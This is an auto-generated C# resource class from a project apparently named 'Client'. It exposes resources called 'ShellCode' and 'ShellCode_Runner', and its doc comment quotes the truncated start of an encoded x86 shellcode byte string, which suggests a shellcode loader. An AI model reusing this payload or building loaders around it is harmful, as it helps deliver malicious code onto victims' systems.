//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Client.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Client.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to 0xda,0xd1,0xba,0x2c,0x04,0xd1,0x12,0xd9,0x74,0x24,0xf4,0x58,0x2b,0xc9,0xb1,0x59,0x31,0x50,0x19,0x83,0xc0,0x04,0x03,0x50,0x15,0xce,0xf1,0x2d,0xfa,0x81,0xfa,0xcd,0xfb,0xfd,0x73,0x28,0xca,0x2f,0xe7,0x38,0x7f,0xff,0x63,0x6c,0x8c,0x74,0x21,0x85,0x83,0x3d,0x8c,0x83,0xaa,0xbe,0x9a,0xbe,0xe4,0x71,0x5d,0x92,0xc9,0x10,0x21,0xe9,0x1d,0xf2,0x18,0x22,0x50,0xf3,0x5d,0xf4,0x1e,0x1c,0x33,0x50,0x6a,0xb0,0xa4,0xd5,0x2e,0x08,0xc4,0x39,0x25,0x30,0xbe,0x3c,0xfa,0xc4,0x72,0x3e,0x2b,0xaf,0xd3,0x60,0x9b,0xae,0x30,0xeb,0x53,0xa8,0x [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string ShellCode {
            get {
                return ResourceManager.GetString("ShellCode", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to .
        /// </summary>
        internal static string ShellCode_Runner {
            get {
                return ResourceManager.GetString("ShellCode_Runner", resourceCulture);
            }
        }
    }
}
